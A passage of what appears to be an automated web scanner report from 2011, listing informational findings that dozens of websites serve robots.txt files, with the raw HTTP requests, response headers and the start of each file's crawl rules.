26.1076. http://www.usapaydayassistance.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.usapaydayassistance.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usapaydayassistance.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:21:07 GMT
Server: Apache/1.3.41 (Unix) PHP/5.3.5 mod_ssl/2.8.31 OpenSSL/0.9.8q
Last-Modified: Mon, 24 Jan 2011 18:38:59 GMT
ETag: "2182e5f-e7-4d3dc743"
Accept-Ranges: bytes
Content-Length: 231
Connection: close
Content-Type: text/plain

User-Agent: *

Disallow: /_old/
Disallow: /inc/
Disallow: /includes/
Disallow: /privacy/
Disallow: /terms/
Disallow: /unsub/

Noindex: /_old/
Noindex: /inc/
Noindex: /includes/
Noindex: /privacy/
Noin
...[SNIP]...

26.1077. http://www.usatourist.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.usatourist.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usatourist.com

Response

HTTP/1.1 200 OK
Content-Length: 476
Content-Type: text/plain
Content-Location: http://www.usatourist.com/robots.txt
Last-Modified: Thu, 14 Jun 2007 16:53:56 GMT
Accept-Ranges: bytes
ETag: "0ea8398a4aec71:1ca6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:07:43 GMT
Connection: close

User-agent: * # directed to all spiders, not just Scooter
Disallow: /deutsch/menus
Disallow: /deutsch/random
Disallow: /deutsch/notfound.html
Disallow: /english/menus
Disallow: /english/random
...[SNIP]...

26.1078. http://www.usavacuum.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.usavacuum.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usavacuum.com

Response

HTTP/1.1 200 OK
Content-Length: 68
Content-Type: text/plain
Last-Modified: Thu, 02 Dec 2010 17:15:38 GMT
Accept-Ranges: bytes
ETag: "448d3f8a4492cb1:9dcd"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:24:51 GMT
Connection: close

# robots.txt for search engines

User-agent:*
Disallow: /cgi-bin/

26.1079. http://www.uschess.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.uschess.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.uschess.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:31:45 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 10 May 2010 18:56:34 GMT
ETag: "3050d84-5cd-48641f7b9fc80"
Accept-Ranges: bytes
Content-Length: 1485
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
disallow: //
Disallow: /about/
Disallow: /administrator/
Disallow: /affil/
Disallow: /assets/
Disallow: /backups/
Disallow: /binfo/
Disallow: /board/
Disallow: /cache/
Disallo
...[SNIP]...

26.1080. http://www.usedforsale.biz/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.usedforsale.biz
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usedforsale.biz

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:28:32 GMT
Server: Apache/2.2.15
Last-Modified: Sat, 17 Jul 2010 04:43:38 GMT
ETag: "1a582b2-6a-48b8dfa9bb280"
Accept-Ranges: bytes
Content-Length: 106
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /advanced.php
Disallow: /addtosearchbox.php
Disallow: /cgi-bin/
Disallow: /layout/

26.1081. http://www.userfriendly.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.userfriendly.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.userfriendly.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:19:34 GMT
Server: Apache/1.3.39 (Unix) mod_gzip/1.3.26.1a mod_perl/1.30 mod_ssl/2.8.30 OpenSSL/0.9.7e-p1
Last-Modified: Sat, 12 May 2007 16:50:45 GMT
ETag: "cb8067-1ed-4645f065"
Accept-Ranges: bytes
Content-Length: 493
Connection: close
Content-Type: text/plain

# Google ad pages robots are special
User-agent: Mediapartners-Google*
Disallow: /cgi-bin/
Disallow: /discus/
Disallow: /email-addresses/
Disallow: /cartoons/read.cgi
# Google robots get in free
Use
...[SNIP]...

26.1082. http://www.usherbrooke.ca/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.usherbrooke.ca
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usherbrooke.ca

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:21:54 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 15 Dec 2010 18:14:47 GMT
ETag: "1bcfdf1-1c4-e98b53c0"
Accept-Ranges: bytes
Content-Length: 452
Content-Type: text/plain
Connection: close

User-agent: LinkChecker
Disallow:

User-agent: *
Disallow: /bourses/
Disallow: /bottin/recherche/
Disallow: /cgi-bin/
Disallow: /Catifq/
Disallow: /stats/
Disallow: /wstats/
Disallow: /VWB/
Disallow:
...[SNIP]...

26.1083. http://www.uwstout.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.uwstout.edu
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.uwstout.edu

Response

HTTP/1.1 200 OK
Content-Length: 86
Content-Type: text/plain
Content-Location: http://www.uwstout.edu/robots.txt
Last-Modified: Tue, 25 Jan 2011 21:23:23 GMT
Accept-Ranges: bytes
ETag: "dcd3019d6bccb1:ae7"
Server: Microsoft-IIS/6.0
Date: Tue, 03 May 2011 11:32:23 GMT
Connection: close

User-agent: *
Allow: http://www.uwstout.edu/
Disallow: http://authoring.uwstout.edu/

26.1084. http://www.uzitalk.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.uzitalk.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.uzitalk.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:38:29 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_fcgid/2.3.6 Phusion_Passenger/3.0.7
Last-Modified: Fri, 15 Apr 2005 17:50:03 GMT
ETag: "59003b-d18-3f4cd459508c0"
Accept-Ranges: bytes
Content-Length: 3352
Connection: close
Content-Type: text/plain

#ALL BOTS
User-agent: *
Disallow: /cgi-bin/
Disallow: /wwwboard/
Disallow: /forums/admin/
Disallow: /forums/mod/
Disallow: /forums/attachments/
Disallow: /forums/clientscript/
Disallow: /forums/cpstyl
...[SNIP]...

26.1085. http://www.vacapedia.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vacapedia.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vacapedia.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:31:39 GMT
Server: Apache
Last-Modified: Wed, 06 Apr 2011 02:21:11 GMT
ETag: "1070183-2f7-a56e73c0"
Accept-Ranges: bytes
Content-Length: 759
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots.txt for http://vacapedia.com/
# created on: 2006-06-08
# modified on:

User-agent: * # allows ALL bots to crawl
# except in the following directories
Disallow: /admin/
Disallow
...[SNIP]...

26.1086. http://www.vacationrentalsad.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vacationrentalsad.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vacationrentalsad.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:05:15 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8i DAV/2 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: VACATIONRENTALSAD=770be6eaf4c4b24386fc9aa44891fd52; expires=Fri, 02-May-2036 17:05:16 GMT; path=/; domain=.vacationrentalsad.com
Set-Cookie: VACATIONRENTALSAD=770be6eaf4c4b24386fc9aa44891fd52; expires=Fri, 02-May-2036 17:05:16 GMT; path=/; domain=.vacationrentalsad.com
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

User-agent: *
Disallow: /travelocity-widget-hotel.html
Disallow: /travelocity-widget-car.html
Disallow: /travelocity-widget-flight.html
Disallow: /searches/
Disallow: /users/
Disallow: /reviews/add/

26.1087. http://www.valueapproved.info/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.valueapproved.info
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.valueapproved.info

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:24:29 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 06 Jul 2010 02:35:54 GMT
ETag: "7900b17-6a-48aaee98b3680"
Accept-Ranges: bytes
Content-Length: 106
Connection: close
Content-Type: text/plain

# Disallow Web Bots
User-agent: *
Disallow: /

# Disallow Archive Bots
User-agent: ia_archiver
Disallow: /

26.1088. http://www.vampfangs.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vampfangs.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vampfangs.com

Response

HTTP/1.1 200 OK
Content-Length: 68
Content-Type: text/plain
Last-Modified: Fri, 08 Apr 2011 09:29:25 GMT
Accept-Ranges: bytes
ETag: "eca05e73cff5cb1:2282"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:43:14 GMT
Connection: close

# robots.txt for search engines

User-agent:*
Disallow: /cgi-bin/

26.1089. http://www.vanguardmil.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vanguardmil.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vanguardmil.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:41:30 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 21 Jan 2010 14:08:37 GMT
ETag: "2c30ef5-67-47dad3d3c0340"
Accept-Ranges: bytes
Content-Length: 103
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /hardcorps/
Allow: *
Sitemap: http://www.vanguardmil.com/xmlmap/xmlmap.xml

26.1090. http://www.vegastripping.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vegastripping.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vegastripping.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:07:20 GMT
Server: Apache
Last-Modified: Sun, 21 Oct 2007 05:58:20 GMT
ETag: "ff826f2-233-471aea7c"
Accept-Ranges: bytes
Content-Length: 563
Connection: close
Content-Type: text/plain

####################################
#
# robots.txt for Disallow: /
#
####################################
#
# $Id: VegasTripping.com robots.txt,v 2.0 2007/10/17 04:11 CM $
#
#########################
...[SNIP]...

26.1091. http://www.veoliaes-sw.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.veoliaes-sw.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.veoliaes-sw.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:17:57 GMT
Server: Apache/2
Last-Modified: Fri, 23 Nov 2007 20:35:52 GMT
ETag: "29304c3-5b-8f83ba00"
Accept-Ranges: bytes
Content-Length: 91
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /admin
Disallow: /Images
Disallow: /Styles
Disallow: /resources

26.1092. http://www.verizonbusiness.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonbusiness.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.verizonbusiness.com

Response

HTTP/1.0 200 OK
Vary: Cookie, User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "16d7dda8ba31fcf8f0e4008a05049aa6"
Last-Modified: Tue, 16 Nov 2010 15:37:45 GMT
Content-Type: text/plain; charset=ISO-8859-1
Content-Length: 319
Date: Tue, 03 May 2011 10:41:19 GMT
Connection: close

User-Agent: *
Disallow: /

User-Agent: Googlebot
Allow: /
Disallow: /search/

User-Agent: Slurp
Allow: /
Disallow: /search/
crawl-delay: 90

User-Agent: msnbot
Allow: /
Disallow: /search/
crawl-dela
...[SNIP]...

26.1093. http://www.videora.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.videora.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.videora.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:33:15 GMT
Server: Apache
Last-Modified: Fri, 07 Sep 2007 19:00:03 GMT
ETag: "65b0f3c-75-3f1112c0"
Accept-Ranges: bytes
Content-Length: 117
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

# Robots.txt file for http://www.videora.com

User-agent: *
Disallow:
Sitemap: http://www.videora.com/sitemap.xml

26.1094. http://www.vikingrivers.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vikingrivers.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vikingrivers.com

Response

HTTP/1.1 200 OK
Content-Length: 265
Content-Type: text/plain
Last-Modified: Fri, 10 Dec 2004 22:42:09 GMT
Accept-Ranges: bytes
ETag: "b0206d7b9dfc41:57ed"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:33:12 GMT
Connection: close

User-Agent: *
Disallow: /Administrator/
Disallow: /aspnet_client/
Disallow: /bin/
Disallow: /Common/
Disallow: /cruise/
Disallow: /aspnet_client/
Disallow: /gfx/
Disallow: /Images/
Disallow:
...[SNIP]...

26.1095. http://www.vincelewis.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vincelewis.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vincelewis.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:56:23 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 26 Feb 2011 14:26:23 GMT
ETag: "7300cc-4a-49d303b2341c0"
Accept-Ranges: bytes
Content-Length: 74
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/

User-agent: Googlebot-Image
Disallow: /

26.1096. http://www.virtualdj.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.virtualdj.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.virtualdj.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 29 Apr 2011 08:37:54 GMT
Vary: Accept-Encoding
Content-Type: text/plain
X-Cacheable: NO:Not Cacheable
Content-Length: 123
Date: Tue, 03 May 2011 10:29:26 GMT
Connection: close
X-Cache: MISS

User-agent: *
Disallow: /homepage/action/
Disallow: /wiki/action/
Disallow: /forums/action/
Disallow: /addons/action/

26.1097. http://www.virtualrabbit.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.virtualrabbit.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.virtualrabbit.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:11:07 GMT
Server: Apache
Last-Modified: Wed, 02 Dec 2009 02:10:32 GMT
ETag: "210129d-85-479b5611a5600"
Accept-Ranges: bytes
Content-Length: 133
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /tours/
Disallow: /media/
Disallow: /export/
Disallow: /fp/
Disallow: /control/
Disallow: /hotspots/
Allow: /

26.1098. http://www.visitmaine.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.visitmaine.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.visitmaine.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:25:57 GMT
Server: Apache/2.0.61 (Unix) mod_ssl/2.0.61 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_auth_passthrough/2.1 FrontPage/5.0.2.2635 PHP/5.2.5
Last-Modified: Mon, 31 Jan 2011 23:24:49 GMT
ETag: "2975b8-6f-ba482840"
Accept-Ranges: bytes
Content-Length: 111
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
Disallow: /stats/
Disallow: /secure/
Sitemap: http://www.visitmaine.net/sitemap.xml

26.1099. http://www.visitmayberry.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.visitmayberry.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.visitmayberry.com

Response

HTTP/1.1 200 OK
Content-Length: 24
Content-Type: text/plain
Last-Modified: Sun, 03 Dec 2006 19:25:33 GMT
Accept-Ranges: bytes
ETag: "a43144cd1017c71:51a7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:02:24 GMT
Connection: close

User-agent: *
Disallow:

26.1100. http://www.visitsouth.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.visitsouth.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.visitsouth.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/plain; charset=UTF-8
Date: Tue, 03 May 2011 10:47:04 GMT
Accept-Ranges: bytes
Connection: close
Set-Cookie: X-Mapping-hppgikmp=A89D712A9180F7E6BEA4AC7011A458B1; path=/
Last-Modified: Wed, 27 Jan 2010 17:36:48 GMT
Content-Length: 66

User-agent: *
Disallow:
sitemap: http://visitsouth.com/sitemap.php

26.1101. http://www.vivareal.us/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vivareal.us
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vivareal.us

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"175-1304366807000"
Last-Modified: Mon, 02 May 2011 20:06:47 GMT
Content-Type: text/plain
Content-Length: 175
Expires: Tue, 03 May 2011 10:47:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 10:47:28 GMT
Connection: close

User-agent: *
Disallow: /util/
Disallow: /contacto/

User-agent: sitebot
Disallow: /

Sitemap: http://sitemap.vivareal.com.s3.amazonaws.com/vr_us/VR_US_sitemapindex.xml

26.1102. http://www.vividracing.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vividracing.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vividracing.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:38:36 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 12 Apr 2011 20:28:53 GMT
ETag: "1c88064-7c3-4a0be8a65cb40"
Accept-Ranges: bytes
Content-Length: 1987
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Slurp
Crawl-delay: 5
User-Agent: *
Disallow: /eletter/
Disallow: /catalog/catalog/admin/
Disallow: /catalog/download/
Disallow: /catalog/includes/
Disallow: /catalog/temp/
Disallow: /catal
...[SNIP]...

26.1103. http://www.voa.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.voa.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.voa.org

Response

HTTP/1.1 200 OK
Content-Length: 358
Content-Type: text/plain
Last-Modified: Wed, 09 Mar 2011 18:35:12 GMT
Accept-Ranges: bytes
ETag: "d039abb988decb1:32a3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:39:44 GMT
Connection: close

User-agent: *
Disallow: /Base.Controls/
Disallow: /Base.Skins/
Disallow: /bin/
Disallow: /Client.Config/
Disallow: /Controls/
Disallow: /Custom.Templates/
Disallow: /Images/
Disallow: /JS/
Di
...[SNIP]...

26.1104. http://www.vva.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vva.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vva.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:19:54 GMT
Server: Apache
Last-Modified: Wed, 03 Mar 2010 03:39:10 GMT
ETag: "17fdc2-330-480dd39a3b380"
Accept-Ranges: bytes
Content-Length: 816
Connection: close
Content-Type: text/plain

#****************************************************************************
# robots.txt
# : Robots, spiders, and search engines use this file to detmine which
# content they should *not*
...[SNIP]...

26.1105. http://www.wackyplanet.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wackyplanet.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wackyplanet.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:23:18 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Cache-Control: max-age=3600, private
Expires: Tue, 03 May 2011 11:23:18 GMT
Last-Modified: Tue, 19 Apr 2011 05:04:52 GMT
Accept-Ranges: bytes
Content-Length: 344
Connection: close
Content-Type: text/plain

User-agent: *
# Cap is html
Disallow: /cgi-bin/
Disallow: /RT/
Disallow: /TG/
Disallow: /QS/
Disallow: /wgl/
Disallow: /P/
Disallow: /ymix/
Disallow: /OS/
Disallow: /cs/
Disallow: /en=
Disallow: /p/s=
...[SNIP]...

26.1106. http://www.warbirdinformationexchange.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.warbirdinformationexchange.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.warbirdinformationexchange.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:40:10 GMT
Server: Apache
Last-Modified: Sun, 08 Jan 2006 01:39:27 GMT
ETag: "1299-43c06d4f"
Accept-Ranges: bytes
Content-Length: 4761
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:

User-agent: BotRightHere
Disallow: /

User-agent: WebZip
Disallow: /

User-agent: larbin
Disallow: /

User-agent: b2w/0.1
Disallow: /

User-agent
...[SNIP]...

26.1107. http://www.warriortalk.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.warriortalk.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.warriortalk.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:45:13 GMT
Server: Apache
Last-Modified: Fri, 29 Oct 2010 22:53:46 GMT
Accept-Ranges: bytes
Content-Length: 960
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /admincp/
Disallow: /clientscript/
Disallow: /cpstyles/
Disallow: /customavatars/
Disallow: /customprofilepics/
Disallow: /images/
Disallow: /modcp/
Disallow: /ajax.php
Disallo
...[SNIP]...

26.1108. http://www.washingtonflyfishing.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.washingtonflyfishing.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.washingtonflyfishing.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 03 May 2011 10:24:25 GMT
Content-Type: text/plain
Content-Length: 500
Last-Modified: Thu, 18 Feb 2010 00:49:07 GMT
Connection: close
Accept-Ranges: bytes

# Slurp is Hotbot, AOL, Goto, MSN, Iwon, Looksmart
# User-agent: Slurp
# Crawl-delay: 60
# Disallow: /board/forumdisplay.php
# Disallow: /board/usercp.php?
# Disallow: /dc/

# User-Agent: *
# Disallow
...[SNIP]...

26.1109. http://www.watchcartoononline.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.watchcartoononline.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.watchcartoononline.com

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 10:22:35 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
ETag: "149-4d7815f7-0"
Last-Modified: Thu, 10 Mar 2011 00:06:15 GMT
Content-Type: text/plain
Content-Length: 329
Vary: User-Agent

# robots.txt for http://www.watchcartoononline.com/

User-agent: *
Disallow: /?ref=
Sitemap: http://www.watchcartoononline.com/sitemap.xml
Sitemap: http://www.watchcartoononline.com/newvideositemap.xm
...[SNIP]...

26.1110. http://www.watchforeclosure.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.watchforeclosure.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.watchforeclosure.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:54:48 GMT
Server: Apache/2.2.14 (Unix) mod_jk/1.2.28 PHP/5.3.0
Last-Modified: Sun, 30 Jan 2011 06:03:35 GMT
Accept-Ranges: bytes
Content-Length: 25
Connection: close
Content-Type: text/plain

User-Agent: *
Allow: /

26.1111. http://www.watts.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.watts.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.watts.com

Response

HTTP/1.1 200 OK
Content-Length: 113
Content-Type: text/plain
Content-Location: http://www.watts.com/robots.txt
Last-Modified: Sat, 05 Jun 2010 03:13:36 GMT
Accept-Ranges: bytes
ETag: "7afd77165d4cb1:3c3"
X-Powered-By: ASP.NET
Server: Watts Water Technologies
Date: Tue, 03 May 2011 11:37:52 GMT
Connection: close

User-agent: *
disallow: /pdf/
disallow: /*.pdf$
disallow: /*.doc$
Sitemap: http://www.watts.com/sitemap.xml

26.1112. http://www.wbu.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wbu.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wbu.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:29:39 GMT
Server: Apache/1.3.37 (Unix) FrontPage/5.0.2.2623 mod_ssl/2.8.28 OpenSSL/0.9.7l
Last-Modified: Wed, 29 Dec 2010 14:57:29 GMT
ETag: "1c014-142-4d1b4c59"
Accept-Ranges: bytes
Content-Length: 322
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/
Disallow: /education_bkup/
Disallow: /frdev_old/
Disallow: /_mb_updates/
Disallow: /trademarks/
Disallow: /mediabui
...[SNIP]...

26.1113. http://www.wccls.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wccls.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wccls.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:16:26 GMT
Server: Apache/2.2.16 (Ubuntu)
Last-Modified: Sat, 18 Dec 2010 00:21:31 GMT
ETag: "19a9-624-497a444cb33d0"
Accept-Ranges: bytes
Content-Length: 1572
Vary: Accept-Encoding
Content-Type: text/plain
Via: 1.0 www.wccls.org
Connection: close

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

26.1114. http://www.wcsh6.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
